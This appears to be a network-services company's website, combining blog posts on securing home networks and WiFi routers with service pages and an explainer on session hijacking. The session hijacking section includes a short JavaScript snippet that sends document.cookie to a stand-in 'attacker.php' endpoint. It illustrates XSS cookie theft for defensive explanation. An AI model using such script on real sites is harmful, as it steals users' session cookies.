How to secure your home network?

Securing a home network is a big concern nowadays. As the world is moving towards the beautiful virtual world, there are certain that are not too good for everyone at home. Everything has two sides, the good and the bad. We are always expecting the good, but we should also consider the bad.

Here in this blog, we will talk about securing our home network and our family from the bad in the virtual world.

To secure your home network, you’ll need to add an additional device “Firewall” at the internet terminating point. This will help you go ahead with the security aspects of your network. You can choose simple, pocket friendly, and easy to use firewalls like “MythGuard MGF001 – Mini Firewall

There are following ways to secure the home network

  • Analise all the network traffic going out of your home network
  • Block the incoming traffic from non-genuine places
  • Block traffic to and from malicious websites
  • Tag all the devices being used in the network
  • Keep your wireless network secured with a strong password
  • Setup network alarming system

To start, lets go ahead with the above points one by one

Analise all the network traffic going out of your home network

It is a good way to get started with an analysis of the traffic of the home network first. Say, if I am living n India and the traffic hitting my home network is from China and Pakistan, it is something non-useful for me. This type of analysis can make out good results in securing and blocking traffic to and from such networks.

The analysis should include the following points

  • Which device is sending traffic outside the network
  • Where the data is being sent and received
  • Is the IP to which the data is being sent or received under the risk category (You can check the reputation on https://talosintelligence.com/)
  • Are there any unknown devices connected to the network?
  • Is something unusual happening in the traffic flow of the network?

Block the incoming traffic from non-genuine places

Once you have done the analysis, you will be well known about the sources that are malicious, and that do not require either send traffic to or from the network. You can start blocking the IP addresses that you find malicious.

If you have small children in your house and you want to have a bit of parental control over the data usage, or you don’t want them to surf illegal content like pornographic data, etc. you can do it by simply blocking such category of the website in the Firewall and setting up data usage policy for your children devices. All the facilities are available in the “MythGuard MGF001 – Mini Firewall

You can even block countries, IP range, Category wise domain names, etc. to secure the data access to and from your home network.

Block traffic to and from malicious websites

Blocking traffic to and from malicious websites is the same concept as discussed above, the difference is, you can do this by simply selecting the blocking feature generally available in all the Next Generation Firewall (NGFW). Firewalls not only block the traffic from malicious websites (blocking will include blocking of surfing, downloading, and uploading of data) but also, keep on updating the list of malicious websites.

The list gets updated and hence your network stays updated too. Security from such websites keeps you away from attacks like ransomware attacks, spoofing, phishing, etc.

Tag all the devices being used in the network

Tagging devices means, adding them to the network by binding them via MAC address. It is generally one of the best ways to secure your network. In your home network, you can evaluate the total number of devices that actually require an internet connection, and then you can connect them to the network, after connecting them to the network either via wired or wireless modes, you should bind the IP address to the MAC address of each device and block other devices to join the network.

Binding MAC address to the devices will lead to NO ADDITIONAL DEVICE in the network and thus, your wireless and wired network will be more secure, as no one standing outside your home accessing your wireless network range will be able to connect to your network. Even if he/she has the password of your wireless network.

Binding devices will also give you additional features like bandwidth motoring, access control, bandwidth control, etc.

Keep your wireless network secured with a strong password

A strong password policy is always required to keep the network secure. You should always keep a strong password for your wireless network and should always keep updating it regularly. The more complex the password is, the harder it is to guess.

A strong password also secures you from attacks like, dictionary attack, etc.

You should ensure that all the devices in the network, where ever there is a need for password protection, should have a custom password. You should not leave any of the devices on its default password setup. It can cause loopholes in your network.

Setup network alarming system

Setup an alarming system to keep yourself updated if there are any problems in your network. NGFWs have features to provide you Email and SMS-based alarms in case of different situations. You can set up alarms in situations like high bandwidth usage, network failure, a new device added to the network, etc.

This will help you monitor your home network even if you are not at your home or if you are not consistently monitoring your network. The more alarms your setup, the more secure your network will be. You will get more insights into your network.

Conclusion

Concluding the above, it is always suggested to keep your home network secure as we are adding up multiple devices for either personal use or home automation on regular basis. If your home network gets compromised, it can lead to severe consequences. Take a step today and go ahead securing your home network.

You can get in touch with us if in case you require any help in securing your network. Click here to discuss with us.

Session Hijacking

While working with codes, the biggest issues which comes in picture is the security. There are multiple ways to secure your code from known threats, one on them is session hijacking.

What is session hijacking?

Well, session hijacking, in simple words can be understood as someone else showing your ID card to enter inside your premises.

Every time, when a client connects with server, s/he is provided with a unique session ID. This session ID is used for all the communications between the user and server.

Session hijacking is a TCP security attack on user session over a network. This is generally called as man-in-middle attack, as someone sitting between the client and server looks for the session details and then presents herself / himself as the client to the server.

There are a few common methods of session hijacking

  • IP spoofing
  • Cross site scripting
  • Packet sniffing
  • Bind attack

IP Spoofing

Spoofing simply means pretending to be someone else. This is a technique used to gain unauthorized access to the computer with an IP address of a trusted host. In implementing this technique, attacker has to obtain the IP address of the client and inject his own packets spoofed with the IP address of client into the TCP session, so as to fool the server that it is communicating with the victim i.e. the original host.

Cross site scripting (XSS)

Attacker can also capture victim’s Session ID using XSS attack by using JavaScript. If an attacker sends a crafted link to the victim with the malicious JavaScript, when the victim clicks on the link, the JavaScript will run and completes the instructions made by the attacker.

 <SCRIPT type="text/javascript"> 
var adr = '../attacker.php?victim_cookie=' + escape(document.cookie);
</SCRIPT>

Packet sniffing

Packet sniffing is a way of session hijacking similar to IP spoofing. In this an attacker sniffs into the network and finds a way to get the session ID packets between a user and server. Once the session details is retrieve by the attacker, s/he hits the server with the same session details and pretends to be the actual client.

This can be done using tools like packet sniffer.

Attacker Sniffing for Session ID
Attacker using session ID to gain access

In the above figure, it can be seen that attack captures the victim’s session ID to gain access to the server by using some packet sniffers.

Blind Attack

If attacker is not able to sniff packets and guess the correct sequence number expected by server, brute force combinations of sequence number can be tried.

Security

To defend a network with session hijacking, a defender has to implement both security measures at Application level and Network level. Network level hijacks can be prevented by Ciphering the packets so that the hijacker cannot decipher the packet headers, to obtain any information which will aid in spoofing. This encryption can be provided by using protocols such as IPSec, SSL, SSH etc. Internet security protocol (IPSec) has the ability to encrypt the packet on some shared key between the two parties involved in communication. IPsec runs in two modes: Transport and Tunnel.
In Transport Mode only the data sent in the packet is encrypted while in Tunnel Mode both packet headers and data are encrypted, so it is more restrictive.

Session hijacking is a serious threat to Networks and Web applications on web as most of the systems are vulnerable to it.

At Network Level – You can implement SSL for allowing users to access website with https. You can add firewalls and add rules to secure you from attacks. The firewalls will also help you create tunnel for data transfer. You can use VPN for more secure network.

At Application Level – You can implement single session concept, this will ensure only a single session ID, that to from a single IP is accessing the server. You can reset sessions in a fixed interval of time and can encrypt all the data before sending it to client. Also, to prevent Cross site scripting(XSS), you can strip tags, can use X-XSS-Protection Header in your code, and multiple other options are there.

You can understand how to secure your network here

How to secure your office / home WiFi router?

There has been a huge growth in use of internet through different mediums. One of the largely used one is WIFI. People now-a-days setup wifi connection at their homes and offices to use internet for different purpose. But they are unaware of the security risks of the same. An unsecured Wi-Fi router running on the default manufacturer settings could be a liability when it comes to hackers and Wi-Fi squatters accessing your private information and burdening your broadband.

If your Wi-Fi network isn’t secured properly — a public IP address, no unique Wi-Fi password — you could be letting anyone with a wireless-enabled device gain access. You might not be worried about someone using your wireless connection, but the real risk is exposing sensitive information you send and receive — your emails, banking information, and maybe even your smart home’s daily schedule — to cyber-criminals.

Basic router security
There should always be a strong password on every router to keep you secure from the bad guys out there.. Now a days, the routers come with default settings and default passwords, that work as plug and play systems, but you should change these passwords as soon as you start using them. Keep a note that a complex, unique, and tough to guess password will give you some good sort of security. It will take only some couple of minutes to set it up, you just need to follow the instructions, which varies router to router.


Depending on your router, you might have options for different kinds of encryption. The most common router encryption types are WEP, WPA and WPA2. Commercial routers from brands like Netgear, Linksys, and ASUS often include:

Wired Equivalent Privacy (WEP): This is the oldest and most popular form of router encryption available. However, it is the least secure of all encryption protocols. It uses radio-waves that are easy to crack. For every data packet that is transmitted it uses the same encryption key. With the help of automated software, this information can easily be analyzed.

Wi-Fi Protected Access (WPA): The Wi-Fi Alliance came up with WPA to offer an encryption protocol without the shortcomings of WEP. It scrambles the encryption key thereby getting rid of the problems caused by hackers cracking the radio-waves. This is also a less secure form of encryption, partly because of legacy hardware and firmware that still used WEP as their main protocol. However, it is a significant improvement over WEP.

Wi-Fi Protected Access 2 (WPA2): This encryption type is currently the most secure and most recent form of encryption available. You should always select WPA2 if it is available. It not only scrambles the encryption key but is also does not allow the use of Temporal Key Integrity Protocol or TKIP which is known to be less secure then AES.

Advanced Encryption Standard: When possible, you’ll want to use AES on top of WPA2 or WPA. This is the same type of encryption used by the federal government to secure classified information. Routers made after 2006 should have the option to enable this on top of WPA2.


Always follow the below rules:

Update your router with new firmware and keep it up to date
Updating your router’s firmware is an important security measure to help protect your router against the latest threats. Most modern routers allow you to enable notifications to prompt you when the manufacturer makes patches and updates to the router’s firmware available. Some manufacturers may even push the update automatically to your hardware, so you don’t have to do anything. However, there are some routers that have updates within the settings option. In this case, the user has to make sure that the firmware is manually updated regularly.

Change your login credentials and router password on regular basis
Traditional routers come with a default password created by the manufacturer. While it may look complex and resistant to hacking, there is a good chance most models of the same router share the same password. These passwords are often easy to trace or find on the internet. Make sure you change these passwords on setup and also ensure regular password update of your router.

Always use WPA2 to secure your wireless network
Wi-Fi Protected Access 2, better known as WPA2, is a commonly used network security technology used on wireless routers.

It is one of the most secure encryption options available in the market since 2006. WPA2 scrambles the traffic going in and out of the router. That means even if someone is within range and can see traffic, all they see is the encrypted version.

Disable WPS
Wi-Fi Protected Setup (WPS) was created with the intention of making the user experience easier and quicker when connecting new devices to the network. It works on the idea that you press a button on the router and a button on the device. This makes both devices pair automatically.

The user has the option to use a personal identification number, or PIN, to setup the device to create a connection. This eliminates the use of the 16-character WPA password that most routers use.

However, because of the PIN, WPS earned a bad reputation for being insecure. The PIN is an eight-digit number that can easily be hacked by repeatedly using various combinations of the usernames and passwords. This is carried out with the help of software. This kind of an attack is called a brute force attack.

Most routers allow users to disable WPS. Even if the PIN option appears to be disabled, it is wise to disable WPS. In recent years, it was discovered that many routers from reputed manufacturers allowed PIN-based authentication even when it appeared to be disabled.

Get rid of any risky or unverified services
It would be wise to disable remote access to your router when you are actively connected to it.

Take UPnP, for example. Universal Plug and Play or UPnP is an easy way to allow devices to find other devices on your network. It can also alter the router to allow devices from other networks to access your device. However, it has helped hackers to introduce malware and viruses by making them bypass the firewall. Mirai Botnet is an example of one such attack.

Other router security helpers
Aside from your router settings and making sure to use your Wi-Fi network’s security features, there are some other options, like using a virtual private network, in addition to device security and identity theft protection in the form of all-in-one protection like the NEW Norton 360 with LifeLock.

Use a virtual private network or VPN
A virtual private network (VPN) encrypts connections between devices, creating online privacy and anonymity. A VPN can mask your internet protocol (IP) address so your online actions are virtually untraceable. VPN services establish secure and encrypted connections to provide greater privacy of the data you send and receive, even on secured Wi-Fi hotspots.

Always use a firewall
A firewall monitors incoming and outgoing network traffic and allows or blocks specific traffic. It is an important security feature to look for when selecting a router. For the online safety of your network and devices, it’s smart to never disable a firewall.

Install and use a strong antivirus and security software
Setting up security for your wireless network doesn’t take much time at all and will do much to help protect you against hackers. Cyber-criminals work tirelessly to gain access to your personal and financial information. A small investment in security software could go a long way.

Even if you don’t have neighbors you want to prevent from borrowing your Wi-Fi, you’ll be protecting yourself from more dangerous snoops. Especially now that so many homes are connected and various devices are using Wi-Fi, you’ll be wise to protect all of the information those devices contain. Don’t take chances. Just a few minutes of selecting the right home Wi-Fi router settings can mean all the difference to your connected world.

 If you are still worried about securing your network from invaders, and want to secure your network, or if you are looking for network security experts, get in touch with us today! our team will be happy helping you out.

We provide all sort of network setup, network security and data monitoring services.

For any service requirements, connect with us here

Network Maintenance

Network maintenance basically means you have to do what it takes in order to keep a network secure, up and running and it includes a number of tasks and we do exactly the same:

  • Troubleshooting network problems.
  • Hardware and software installation/configuration.
  • Monitoring and improving network performance.
  • Planning for future network growth.
  • Creating network documentation and keeping it up-to-date.
  • Ensuring compliance with company policies.
  • Ensuring compliance with legal regulations.
  • Securing the network against all kinds of threats.

Whatever network maintenance model you decide to use, there are always a number of routine maintenance tasks that should have listed procedures, here are a couple of examples:

  • Configuration changes
  • Replacement of hardware
  • Backups
  • Monitoring

Normally we will create a list with the tasks that have to be done for your network. These tasks can be assigned a certain priority. Making changes to your network will sometimes impact productivity of users who rely on the network availability. Some changes will have a huge impact, changes to firewalls or access-list rules might impact more users then you’d wish for.

Our team of expert keeps in mind the higher availability and stability of the network. We ensure lower downtime for maintenance and upgrades. Before any such activity, our team sets up the best planning and time-spans with proper communication for the same.

For any service related query, you can get in touch with us here

Network Planning and Setup

We help individuals and companies in planning and setting up their network. Our services includes Network planning, Hardware setup and configuration, Host configuration, Software configuration, Server deployment and lot more. All we do follows some major steps according to the companies’ / Individual’s requirements.

It is painful for companies and individuals to plan and setup a proper network which can satisfy their needs. But believe us, we will help you to setup it up and you will keep yourself away from that pain.

From our past experience we believe that while setting up a network, a proper planning is the major part. As planned networks satisfy the needs and keeps the work up without any hazels. A proper planned network is highly available, robust, scalable and provides connectivity to all authentic people keeping your data safe from outside world.

We help companies / individuals setting up intranet connection, internet connection, VPN, Security setup and lot more.
Ranging from sharing of devices over network to sharing of data, setting up policies, setting up access control, setting up hardwares and lot more. We provide all the services under one hood.

Companies always have a deep concern of security of data, we can understand the importance and need of it. That’s why we have a policy of security first while setting up any network.

For small businesses and individuals, setting up a router with plug and play functionality, should keep in mind that plug and play devices are vulnerable. For people who are looking for setting up their home / office network over simple router can go though the below blog which will guide you securing your home/office WiFi network.

How to secure your office / home WiFi router?

For offices which need

  • Secure network
  • Scalable network
  • Robust network
  • Who have need of high availability over secure connections like Virtual Private Network (VPN).
  • Who have a futuristic approach of handling their network and data.

Should opt for our network planning and setup services.

We ensure that all the required hardware and software are properly configured. Hardware ranging from routers, firewalls, access-points, switches, etc. are planned and configured by experts.

We have a team of highly experienced and highly certified professionals. We ensure proper service and solution for all kind of networking needs.

For further details, you can get in touch with us here

Network Security

Network security is any activity designed to protect the usability and integrity of your network and data.

  • It comprise both hardware and software technologies
  • It detects a variety of threats
  • It stops them from entering or spreading on your network
  • Effective network security manages access to the network

How is the network security process?

Network security combines multiple layers of defenses at the edge and in the network. Each network security layer implements policies and controls. Authorized users gain access to network resources, but malicious actors are blocked from carrying out exploits and threats.

How do you benefit from network security?

Every organization that wants to deliver the services that customers and employees demand must protect its network. Network security also helps you protect proprietary information from attack. Ultimately it protects your reputation.

But most importantly, when it comes to network security solutions, the big question that arises is – WHAT ALL SERVICES DO WE NEED FOR SECURING DATA OVER NETWORK? Right?? So we are here with the answer you need to know before taking any wrong step. When you are working on the internet or on any intranet, or over other connections like VPN etc. you can opt for the following services that fall under network and data security. Namely:

  • Firewalls
  • VPN
  • Application security
  • Access control
  • Email security
  • Behavioral analytics
  • Data loss prevention
  • Intrusion prevention systems
  • Mobile device security
  • Security information and event management
  • Web security
  • Wireless security
  • Network segmentation
  • Anti-virus and anti-malware software

Firewalls

Firewalls put up a barrier between your trusted internal network and non-trusted outside networks, such as the Internet. They use a set of defined rules to allow or block traffic. A firewall can be hardware, software, or both.

VPN

A virtual private network encrypts the connection from an endpoint to a network, often over the Internet. Typically, a remote-access VPN uses IPsec or Secure Sockets Layer to authenticate the communication between device and network.

Application security

Any software you use to run your business needs to be protected, whether your IT staff builds it or whether you buy it. Unfortunately, any application may contain holes, or vulnerabilities, that attackers can use to infiltrate your network. Application security encompasses the hardware, software, and processes you use to close

Access control

Not every user should have access to your network. To keep out potential attackers, you need to recognize each user and each device. Then you can enforce your security policies. You can block non-compliant endpoint devices or give them only limited access. This process is network access control (NAC).

Email security

Email gateways are the number one threat vector for a security breach. Attackers use personal information and social engineering tactics to build sophisticated phishing campaigns to deceive recipients and send them to sites serving up malware. An email security application blocks incoming attacks and controls outbound messages to prevent the loss of sensitive data.

Behavioral analytics

To detect abnormal network behavior, you must know what normal behavior looks like. Behavioral analytics tools automatically discern activities that deviate from the norm. Your security team can then better identify indicators of compromise that pose a potential problem and quickly remediate threats.

Data loss prevention

Organizations must make sure that their staff does not send sensitive information outside the network. Data loss prevention, or DLP, technologies can stop people from uploading, forwarding, or even printing critical information in an unsafe manner.

Intrusion prevention systems

An intrusion prevention system (IPS) scans network traffic to actively block attacks. It not only blocks malicious activity but also tracks the progression of suspect files and malware across the network to prevent the spread of outbreaks and reinfection.

Mobile device security

Mobile security automatically and remotely deletes your data on lost devices. Mobile security prevents you from losing your phone containing vital personal or business data. To prevent the loss of company or personal data, an excellent mobile security solution will be able to erase data stored in your phone. You need to control which devices can access your network. You will also need to configure their connections to keep network traffic private.

Security information and event management

SIEM products pull together the information that your security staff needs to identify and respond to threats. These products come in various forms, including physical and virtual appliances and server software.

Web security

A web security solution will control your staff’s web use, block web-based threats, and deny access to malicious websites. It will protect your web gateway on site or in the cloud. “Web security” also refers to the steps you take to protect your own website.

Wireless security

Wireless networks are not as secure as wired ones. Without stringent security measures, installing a wireless LAN can be like putting Ethernet ports everywhere, including the parking lot. To prevent an exploit from taking hold, you need products specifically designed to protect a wireless network.

Network segmentation

Software-defined segmentation puts network traffic into different classifications and makes enforcing security policies easier. Ideally, the classifications are based on endpoint identity, not mere IP addresses. You can assign access rights based on role, location, and more so that the right level of access is given to the right people and suspicious devices are contained and remediated.

Anti-virus and anti-malware software

These software are used for protection against malware, which includes spyware, ransomware, Trojans, worms, and viruses. Malware can also become very dangerous as it can infect a network and then remain calm for days or even weeks. These software handles this threat by scanning for malware entry and regularly tracks files afterward in order to detect anomalies, remove malware, and fix damage.